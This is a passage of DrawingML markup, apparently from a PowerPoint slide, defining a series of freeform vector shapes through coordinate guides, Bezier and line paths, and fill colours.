                      <a:pt x="174" y="575"/>
                      <a:pt x="171" y="580"/>
                      <a:pt x="168" y="585"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="619"/>
                      <a:pt x="114" y="657"/>
                      <a:pt x="90" y="700"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="842"/>
                      <a:pt x="0" y="969"/>
                      <a:pt x="63" y="986"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="986"/>
                      <a:pt x="63" y="986"/>
                      <a:pt x="63" y="986"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="997"/>
                      <a:pt x="104" y="997"/>
                      <a:pt x="104" y="997"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="966"/>
                      <a:pt x="144" y="966"/>
                      <a:pt x="144" y="966"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="1011"/>
                      <a:pt x="144" y="1011"/>
                      <a:pt x="144" y="1011"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="183" y="1022"/>
                      <a:pt x="183" y="1022"/>
                      <a:pt x="183" y="1022"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="719" y="262"/>
                      <a:pt x="719" y="262"/>
                      <a:pt x="719" y="262"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="719" y="217"/>
                      <a:pt x="719" y="217"/>
                      <a:pt x="719" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="747" y="146"/>
                      <a:pt x="756" y="84"/>
                      <a:pt x="743" y="46"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="545554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54" name="Freeform 377">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E8BA7DF-7309-4E2A-941F-D34FCA248C17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953" y="635"/>
                <a:ext cx="1795" cy="2391"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 719 w 760"/>
                  <a:gd name="T1" fmla="*/ 16 h 1012"/>
                  <a:gd name="T2" fmla="*/ 704 w 760"/>
                  <a:gd name="T3" fmla="*/ 10 h 1012"/>
                  <a:gd name="T4" fmla="*/ 502 w 760"/>
                  <a:gd name="T5" fmla="*/ 149 h 1012"/>
                  <a:gd name="T6" fmla="*/ 502 w 760"/>
                  <a:gd name="T7" fmla="*/ 150 h 1012"/>
                  <a:gd name="T8" fmla="*/ 178 w 760"/>
                  <a:gd name="T9" fmla="*/ 571 h 1012"/>
                  <a:gd name="T10" fmla="*/ 168 w 760"/>
                  <a:gd name="T11" fmla="*/ 585 h 1012"/>
                  <a:gd name="T12" fmla="*/ 91 w 760"/>
                  <a:gd name="T13" fmla="*/ 700 h 1012"/>
                  <a:gd name="T14" fmla="*/ 68 w 760"/>
                  <a:gd name="T15" fmla="*/ 987 h 1012"/>
                  <a:gd name="T16" fmla="*/ 144 w 760"/>
                  <a:gd name="T17" fmla="*/ 966 h 1012"/>
                  <a:gd name="T18" fmla="*/ 144 w 760"/>
                  <a:gd name="T19" fmla="*/ 1012 h 1012"/>
                  <a:gd name="T20" fmla="*/ 719 w 760"/>
                  <a:gd name="T21" fmla="*/ 262 h 1012"/>
                  <a:gd name="T22" fmla="*/ 719 w 760"/>
                  <a:gd name="T23" fmla="*/ 218 h 1012"/>
                  <a:gd name="T24" fmla="*/ 719 w 760"/>
                  <a:gd name="T25" fmla="*/ 16 h 10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60" h="1012">
                    <a:moveTo>
                      <a:pt x="719" y="16"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="715" y="13"/>
                      <a:pt x="710" y="11"/>
                      <a:pt x="704" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="654" y="0"/>
                      <a:pt x="573" y="58"/>
                      <a:pt x="502" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="502" y="150"/>
                      <a:pt x="502" y="150"/>
                      <a:pt x="502" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="178" y="571"/>
                      <a:pt x="178" y="571"/>
                      <a:pt x="178" y="571"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="175" y="575"/>
                      <a:pt x="172" y="580"/>
                      <a:pt x="168" y="585"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="141" y="619"/>
                      <a:pt x="114" y="658"/>
                      <a:pt x="91" y="700"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="846"/>
                      <a:pt x="0" y="974"/>
                      <a:pt x="68" y="987"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="991"/>
                      <a:pt x="115" y="984"/>
                      <a:pt x="144" y="966"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="1012"/>
                      <a:pt x="144" y="1012"/>
                      <a:pt x="144" y="1012"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="719" y="262"/>
                      <a:pt x="719" y="262"/>
                      <a:pt x="719" y="262"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="719" y="218"/>
                      <a:pt x="719" y="218"/>
                      <a:pt x="719" y="218"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="759" y="119"/>
                      <a:pt x="760" y="38"/>
                      <a:pt x="719" y="16"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="A0A0A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55" name="Freeform 378">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A176DE57-3A13-4CDA-9664-40646924F1A4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293" y="2792"/>
                <a:ext cx="813" cy="451"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 813"/>
                  <a:gd name="T1" fmla="*/ 0 h 451"/>
                  <a:gd name="T2" fmla="*/ 813 w 813"/>
                  <a:gd name="T3" fmla="*/ 217 h 451"/>
                  <a:gd name="T4" fmla="*/ 813 w 813"/>
                  <a:gd name="T5" fmla="*/ 451 h 451"/>
                  <a:gd name="T6" fmla="*/ 0 w 813"/>
                  <a:gd name="T7" fmla="*/ 234 h 451"/>
                  <a:gd name="T8" fmla="*/ 0 w 813"/>
                  <a:gd name="T9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3" h="451">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="813" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="813" y="451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56" name="Freeform 379">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11492A2D-B733-4C7D-A7A9-E7C696847B6D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293" y="2731"/>
                <a:ext cx="1040" cy="278"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 813 w 1040"/>
                  <a:gd name="T1" fmla="*/ 278 h 278"/>
                  <a:gd name="T2" fmla="*/ 1040 w 1040"/>
                  <a:gd name="T3" fmla="*/ 217 h 278"/>
                  <a:gd name="T4" fmla="*/ 227 w 1040"/>
                  <a:gd name="T5" fmla="*/ 0 h 278"/>
                  <a:gd name="T6" fmla="*/ 0 w 1040"/>
                  <a:gd name="T7" fmla="*/ 61 h 278"/>
                  <a:gd name="T8" fmla="*/ 813 w 1040"/>
                  <a:gd name="T9" fmla="*/ 27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0" h="278">
                    <a:moveTo>
                      <a:pt x="813" y="278"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1040" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="813" y="278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57" name="Freeform 380">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F52F5FC-70F6-4A5E-9EB0-2D8EB5F1BC00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520" y="2497"/>
                <a:ext cx="813" cy="451"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 813"/>
                  <a:gd name="T1" fmla="*/ 0 h 451"/>
                  <a:gd name="T2" fmla="*/ 813 w 813"/>
                  <a:gd name="T3" fmla="*/ 217 h 451"/>
                  <a:gd name="T4" fmla="*/ 813 w 813"/>
                  <a:gd name="T5" fmla="*/ 451 h 451"/>
                  <a:gd name="T6" fmla="*/ 0 w 813"/>
                  <a:gd name="T7" fmla="*/ 234 h 451"/>
                  <a:gd name="T8" fmla="*/ 0 w 813"/>
                  <a:gd name="T9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3" h="451">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="813" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="813" y="451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58" name="Freeform 381">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3723665-6459-4BBF-A657-9F85E9AA7FBC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520" y="2435"/>
                <a:ext cx="1039" cy="279"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 813 w 1039"/>
                  <a:gd name="T1" fmla="*/ 279 h 279"/>
                  <a:gd name="T2" fmla="*/ 1039 w 1039"/>
                  <a:gd name="T3" fmla="*/ 218 h 279"/>
                  <a:gd name="T4" fmla="*/ 227 w 1039"/>
                  <a:gd name="T5" fmla="*/ 0 h 279"/>
                  <a:gd name="T6" fmla="*/ 0 w 1039"/>
                  <a:gd name="T7" fmla="*/ 62 h 279"/>
                  <a:gd name="T8" fmla="*/ 813 w 1039"/>
                  <a:gd name="T9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9" h="279">
                    <a:moveTo>
                      <a:pt x="813" y="279"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1039" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="813" y="279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59" name="Freeform 382">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39F3A8D3-27CF-40C2-8009-A89CD9F6EDE1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747" y="2201"/>
                <a:ext cx="812" cy="452"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 812"/>
                  <a:gd name="T1" fmla="*/ 0 h 452"/>
                  <a:gd name="T2" fmla="*/ 812 w 812"/>
                  <a:gd name="T3" fmla="*/ 218 h 452"/>
                  <a:gd name="T4" fmla="*/ 812 w 812"/>
                  <a:gd name="T5" fmla="*/ 452 h 452"/>
                  <a:gd name="T6" fmla="*/ 0 w 812"/>
                  <a:gd name="T7" fmla="*/ 234 h 452"/>
                  <a:gd name="T8" fmla="*/ 0 w 812"/>
                  <a:gd name="T9" fmla="*/ 0 h 4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2" h="452">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="812" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="812" y="452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60" name="Freeform 383">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B6230DE-B733-40B2-B211-D9EC5ED92EA0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747" y="2140"/>
                <a:ext cx="1037" cy="279"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 812 w 1037"/>
                  <a:gd name="T1" fmla="*/ 279 h 279"/>
                  <a:gd name="T2" fmla="*/ 1037 w 1037"/>
                  <a:gd name="T3" fmla="*/ 217 h 279"/>
                  <a:gd name="T4" fmla="*/ 226 w 1037"/>
                  <a:gd name="T5" fmla="*/ 0 h 279"/>
                  <a:gd name="T6" fmla="*/ 0 w 1037"/>
                  <a:gd name="T7" fmla="*/ 61 h 279"/>
                  <a:gd name="T8" fmla="*/ 812 w 1037"/>
                  <a:gd name="T9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7" h="279">
                    <a:moveTo>
                      <a:pt x="812" y="279"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1037" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="812" y="279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61" name="Freeform 384">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19AC6533-859D-4042-B63E-62B539AFF185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973" y="1906"/>
                <a:ext cx="811" cy="451"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 811"/>
                  <a:gd name="T1" fmla="*/ 0 h 451"/>
                  <a:gd name="T2" fmla="*/ 811 w 811"/>
                  <a:gd name="T3" fmla="*/ 217 h 451"/>
                  <a:gd name="T4" fmla="*/ 811 w 811"/>
                  <a:gd name="T5" fmla="*/ 451 h 451"/>
                  <a:gd name="T6" fmla="*/ 0 w 811"/>
                  <a:gd name="T7" fmla="*/ 234 h 451"/>
                  <a:gd name="T8" fmla="*/ 0 w 811"/>
                  <a:gd name="T9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1" h="451">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="811" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="811" y="451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62" name="Freeform 385">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8810FC07-07DB-4D56-A69E-7005C83F1102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973" y="1845"/>
                <a:ext cx="1037" cy="278"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 811 w 1037"/>
                  <a:gd name="T1" fmla="*/ 278 h 278"/>
                  <a:gd name="T2" fmla="*/ 1037 w 1037"/>
                  <a:gd name="T3" fmla="*/ 217 h 278"/>
                  <a:gd name="T4" fmla="*/ 227 w 1037"/>
                  <a:gd name="T5" fmla="*/ 0 h 278"/>
                  <a:gd name="T6" fmla="*/ 0 w 1037"/>
                  <a:gd name="T7" fmla="*/ 61 h 278"/>
                  <a:gd name="T8" fmla="*/ 811 w 1037"/>
                  <a:gd name="T9" fmla="*/ 27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7" h="278">
                    <a:moveTo>
                      <a:pt x="811" y="278"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1037" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="811" y="278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63" name="Freeform 386">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{982972CE-710F-4069-8FC3-9806EE5596A1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200" y="1611"/>
                <a:ext cx="810" cy="451"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 810"/>
                  <a:gd name="T1" fmla="*/ 0 h 451"/>
                  <a:gd name="T2" fmla="*/ 810 w 810"/>
                  <a:gd name="T3" fmla="*/ 217 h 451"/>
                  <a:gd name="T4" fmla="*/ 810 w 810"/>
                  <a:gd name="T5" fmla="*/ 451 h 451"/>
                  <a:gd name="T6" fmla="*/ 0 w 810"/>
                  <a:gd name="T7" fmla="*/ 234 h 451"/>
                  <a:gd name="T8" fmla="*/ 0 w 810"/>
                  <a:gd name="T9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0" h="451">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="810" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="810" y="451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64" name="Freeform 387">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15599EB5-F232-4B7B-8425-5E72727AB993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200" y="1549"/>
                <a:ext cx="1037" cy="279"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 810 w 1037"/>
                  <a:gd name="T1" fmla="*/ 279 h 279"/>
                  <a:gd name="T2" fmla="*/ 1037 w 1037"/>
                  <a:gd name="T3" fmla="*/ 218 h 279"/>
                  <a:gd name="T4" fmla="*/ 225 w 1037"/>
                  <a:gd name="T5" fmla="*/ 0 h 279"/>
                  <a:gd name="T6" fmla="*/ 0 w 1037"/>
                  <a:gd name="T7" fmla="*/ 62 h 279"/>
                  <a:gd name="T8" fmla="*/ 810 w 1037"/>
                  <a:gd name="T9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7" h="279">
                    <a:moveTo>
                      <a:pt x="810" y="279"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1037" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="810" y="279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65" name="Freeform 388">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{529B27B5-7F26-430A-8A1D-BFF8E1D0A0CF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425" y="1315"/>
                <a:ext cx="812" cy="452"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 812"/>
                  <a:gd name="T1" fmla="*/ 0 h 452"/>
                  <a:gd name="T2" fmla="*/ 812 w 812"/>
                  <a:gd name="T3" fmla="*/ 218 h 452"/>
                  <a:gd name="T4" fmla="*/ 812 w 812"/>
                  <a:gd name="T5" fmla="*/ 452 h 452"/>
                  <a:gd name="T6" fmla="*/ 0 w 812"/>
                  <a:gd name="T7" fmla="*/ 234 h 452"/>
                  <a:gd name="T8" fmla="*/ 0 w 812"/>
                  <a:gd name="T9" fmla="*/ 0 h 4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2" h="452">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="812" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="812" y="452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66" name="Freeform 389">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0024F3E3-1E99-4F2D-AA43-CEC4D6205C6C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425" y="1254"/>
                <a:ext cx="1039" cy="279"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 812 w 1039"/>
                  <a:gd name="T1" fmla="*/ 279 h 279"/>
                  <a:gd name="T2" fmla="*/ 1039 w 1039"/>
                  <a:gd name="T3" fmla="*/ 220 h 279"/>
                  <a:gd name="T4" fmla="*/ 226 w 1039"/>
                  <a:gd name="T5" fmla="*/ 0 h 279"/>
                  <a:gd name="T6" fmla="*/ 0 w 1039"/>
                  <a:gd name="T7" fmla="*/ 61 h 279"/>
                  <a:gd name="T8" fmla="*/ 812 w 1039"/>
                  <a:gd name="T9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9" h="279">
                    <a:moveTo>
                      <a:pt x="812" y="279"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1039" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="812" y="279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67" name="Freeform 390">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA5DA632-3774-4277-96CB-86D0F49E5AD7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673" y="829"/>
                <a:ext cx="1784" cy="2414"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 743 w 755"/>
                  <a:gd name="T1" fmla="*/ 47 h 1022"/>
                  <a:gd name="T2" fmla="*/ 743 w 755"/>
                  <a:gd name="T3" fmla="*/ 47 h 1022"/>
                  <a:gd name="T4" fmla="*/ 743 w 755"/>
                  <a:gd name="T5" fmla="*/ 20 h 1022"/>
                  <a:gd name="T6" fmla="*/ 710 w 755"/>
                  <a:gd name="T7" fmla="*/ 11 h 1022"/>
                  <a:gd name="T8" fmla="*/ 704 w 755"/>
                  <a:gd name="T9" fmla="*/ 10 h 1022"/>
                  <a:gd name="T10" fmla="*/ 501 w 755"/>
                  <a:gd name="T11" fmla="*/ 149 h 1022"/>
                  <a:gd name="T12" fmla="*/ 501 w 755"/>
                  <a:gd name="T13" fmla="*/ 149 h 1022"/>
                  <a:gd name="T14" fmla="*/ 178 w 755"/>
                  <a:gd name="T15" fmla="*/ 571 h 1022"/>
                  <a:gd name="T16" fmla="*/ 168 w 755"/>
                  <a:gd name="T17" fmla="*/ 585 h 1022"/>
                  <a:gd name="T18" fmla="*/ 90 w 755"/>
                  <a:gd name="T19" fmla="*/ 700 h 1022"/>
                  <a:gd name="T20" fmla="*/ 63 w 755"/>
                  <a:gd name="T21" fmla="*/ 986 h 1022"/>
                  <a:gd name="T22" fmla="*/ 63 w 755"/>
                  <a:gd name="T23" fmla="*/ 986 h 1022"/>
                  <a:gd name="T24" fmla="*/ 104 w 755"/>
                  <a:gd name="T25" fmla="*/ 997 h 1022"/>
                  <a:gd name="T26" fmla="*/ 144 w 755"/>
                  <a:gd name="T27" fmla="*/ 966 h 1022"/>
                  <a:gd name="T28" fmla="*/ 144 w 755"/>
                  <a:gd name="T29" fmla="*/ 1011 h 1022"/>
                  <a:gd name="T30" fmla="*/ 183 w 755"/>
                  <a:gd name="T31" fmla="*/ 1022 h 1022"/>
                  <a:gd name="T32" fmla="*/ 718 w 755"/>
                  <a:gd name="T33" fmla="*/ 262 h 1022"/>
                  <a:gd name="T34" fmla="*/ 718 w 755"/>
                  <a:gd name="T35" fmla="*/ 218 h 1022"/>
                  <a:gd name="T36" fmla="*/ 743 w 755"/>
                  <a:gd name="T37" fmla="*/ 47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55" h="1022">
                    <a:moveTo>
                      <a:pt x="743" y="47"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="743" y="47"/>
                      <a:pt x="743" y="47"/>
                      <a:pt x="743" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="743" y="20"/>
                      <a:pt x="743" y="20"/>
                      <a:pt x="743" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="710" y="11"/>
                      <a:pt x="710" y="11"/>
                      <a:pt x="710" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="708" y="11"/>
                      <a:pt x="706" y="10"/>
                      <a:pt x="704" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="653" y="0"/>
                      <a:pt x="572" y="58"/>
                      <a:pt x="501" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="501" y="149"/>
                      <a:pt x="501" y="149"/>
                      <a:pt x="501" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="178" y="571"/>
                      <a:pt x="178" y="571"/>
                      <a:pt x="178" y="571"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="575"/>
                      <a:pt x="171" y="580"/>
                      <a:pt x="168" y="585"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="619"/>
                      <a:pt x="113" y="658"/>
                      <a:pt x="90" y="700"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="842"/>
                      <a:pt x="0" y="969"/>
                      <a:pt x="63" y="986"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="986"/>
                      <a:pt x="63" y="986"/>
                      <a:pt x="63" y="986"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="997"/>
                      <a:pt x="104" y="997"/>
                      <a:pt x="104" y="997"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="966"/>
                      <a:pt x="144" y="966"/>
                      <a:pt x="144" y="966"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="1011"/>
                      <a:pt x="144" y="1011"/>
                      <a:pt x="144" y="1011"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="183" y="1022"/>
                      <a:pt x="183" y="1022"/>
                      <a:pt x="183" y="1022"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="718" y="262"/>
                      <a:pt x="718" y="262"/>
                      <a:pt x="718" y="262"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="718" y="218"/>
                      <a:pt x="718" y="218"/>
                      <a:pt x="718" y="218"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="747" y="146"/>
                      <a:pt x="755" y="84"/>
                      <a:pt x="743" y="47"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="545554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68" name="Freeform 391">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF652AC2-3261-409D-A8E3-5673A11CBFCD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762" y="3000"/>
                <a:ext cx="1344" cy="364"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 439 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 364"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 123 h 364"/>
                  <a:gd name="T4" fmla="*/ 895 w 1344"/>
                  <a:gd name="T5" fmla="*/ 364 h 364"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 243 h 364"/>
                  <a:gd name="T8" fmla="*/ 439 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0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364">
                    <a:moveTo>
                      <a:pt x="439" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="895" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="439" y="0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69" name="Freeform 392">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFB9CB86-EF44-4A7C-BEEE-9971D0C053B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763" y="855"/>
                <a:ext cx="1796" cy="2388"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 720 w 760"/>
                  <a:gd name="T1" fmla="*/ 15 h 1011"/>
                  <a:gd name="T2" fmla="*/ 705 w 760"/>
                  <a:gd name="T3" fmla="*/ 9 h 1011"/>
                  <a:gd name="T4" fmla="*/ 503 w 760"/>
                  <a:gd name="T5" fmla="*/ 149 h 1011"/>
                  <a:gd name="T6" fmla="*/ 503 w 760"/>
                  <a:gd name="T7" fmla="*/ 149 h 1011"/>
                  <a:gd name="T8" fmla="*/ 179 w 760"/>
                  <a:gd name="T9" fmla="*/ 570 h 1011"/>
                  <a:gd name="T10" fmla="*/ 169 w 760"/>
                  <a:gd name="T11" fmla="*/ 585 h 1011"/>
                  <a:gd name="T12" fmla="*/ 91 w 760"/>
                  <a:gd name="T13" fmla="*/ 699 h 1011"/>
                  <a:gd name="T14" fmla="*/ 68 w 760"/>
                  <a:gd name="T15" fmla="*/ 986 h 1011"/>
